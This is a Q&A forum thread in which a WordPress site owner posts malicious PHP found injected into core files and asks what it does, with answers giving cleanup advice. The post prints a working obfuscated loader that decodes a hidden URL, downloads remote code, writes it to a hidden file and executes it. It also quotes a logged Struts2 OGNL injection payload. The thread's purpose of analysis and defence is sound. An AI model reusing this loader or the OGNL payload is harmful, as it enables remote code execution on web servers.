# Strange attack script inserted in WordPress code

Tags: php, wordpress, apache, security, php-5.3

A WordPress website couldn't be accesed from yesterday and only showed a message started with this

> Bootstrap file for setting the ABSPATH constant and loading the wp-config.php file. The wp-config.php file will then load the wp-settings.php file, which will then set up the WordPress environment.

I quickly deactivated the site and looked into the code and found some suspicious PHP script inserted in wp-load.php, wp-setting.php, in several parts in wp-inlcude/functions.php. Would anyone tell me what it was trying to do?

What is your recommendation for my next step? I've recovered the webpage thanks to a backup copy and it seems the attack hasn't involved the database but I'm worried about what kind of information they got from this.

This is the script:

```
<?php
@ini_set('display_errors', '0');
error_reporting(0);
if (!$npDcheckClassBgp) {
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrLUvdAsS7swbOuvdPFbQdr9dm2WSGbE=";
if (ini_get('allow_url_fopen')) {
    function get_data_ya($url) {
        $data = file_get_contents($url);
        return $data;
    }
}
else {
    function get_data_ya($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
}
function wp_cd($fd, $fa="")
{
   $fe = "wp_frmfunct";
   $len = strlen($fd);
   $ff = '';
   $n = $len>100 ? 8 : 2;
   while( strlen($ff)<$len )
   {
      $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
   }
   return $fd^$ff;
}
$reqw = $ay($ao($oa("$pass"), 'wp_function'));
preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
$dirs = glob("*", GLOB_ONLYDIR);
foreach ($dirs as $dira) {
    if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
    $subdirs = glob("$dira/*", GLOB_ONLYDIR);
    foreach ($subdirs as $subdira) {
        if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
    }
}
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
fwrite($hdl, "<?php\n$mtchs[1]\n?>");
fclose($hdl);
include("{$eb}.$algo");
unlink("{$eb}.$algo");
$npDcheckClassBgp = 'aue';
}
?>
```

I've found this on my apache logs:

> File name too long: access to /%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.addHeader('eresult','struts2_security_check'))}/ failed

Answer (score 1):

Your best bet is to wipe everything and start from scratch.  If that's not possible:

1. Remove any suspicious PHP files, especially in the `wp-content` directory.
2. Check the last-modified date of all WordPress' PHP files.  Look for anything else suspicious.  (These can be forged, but attackers rarely bother.)
3. Uninstall all your plugins.  Nearly every WordPress plugin I've checked was full of major vulnerabilities, to the point that it wasn't even worth reporting them.  Anything by Automattic is typically safe, but beyond that, all bets are off.  Anything related to email (subscriptions, mailing lists, etc.) besides JetPack is full of vulnerabilities--I've checked many and never found one that was secure.
4. Ask this question on [the Security Stack Exchange](https://security.stackexchange.com/) if you need to be even more thorough or your site has particularly sensitive data.
5. If your site collects personal data, including email addresses, notify everyone that your site has been compromised.  In some jurisdictions and industries this may be required by law; you should consult a lawyer if you're concerned about your legal obligations.

Comment: Thank you, I will ask in that page. Yes, I removed completely the compromised site and replaced with a backup copy so all compromised code inside the wordpress must be gone now. It's a blog, so no users administration besides the user who updates the blog. Will check if it collect some emails for notifications though.

Comment: @AlisonLopez You should remove all your third-party plugins regardless and run WordPress' automatic update feature.  It will most likely get compromised again if you leave it in the same state.

Comment: Yes! That's why I'm asking...to know where to start changing so this won't happen again! Thank you!

Comment: @AlisonLopez Yeah, step #3 is really the key here: WordPress' plugin ecosystem is broken.  If you use third-party plugins, you're going to get hacked--there's no way around it.

Comment: from the future here: if you are on reseller or shared space then the WHOLE SERVER was compromised you must change your provider or the infection will come back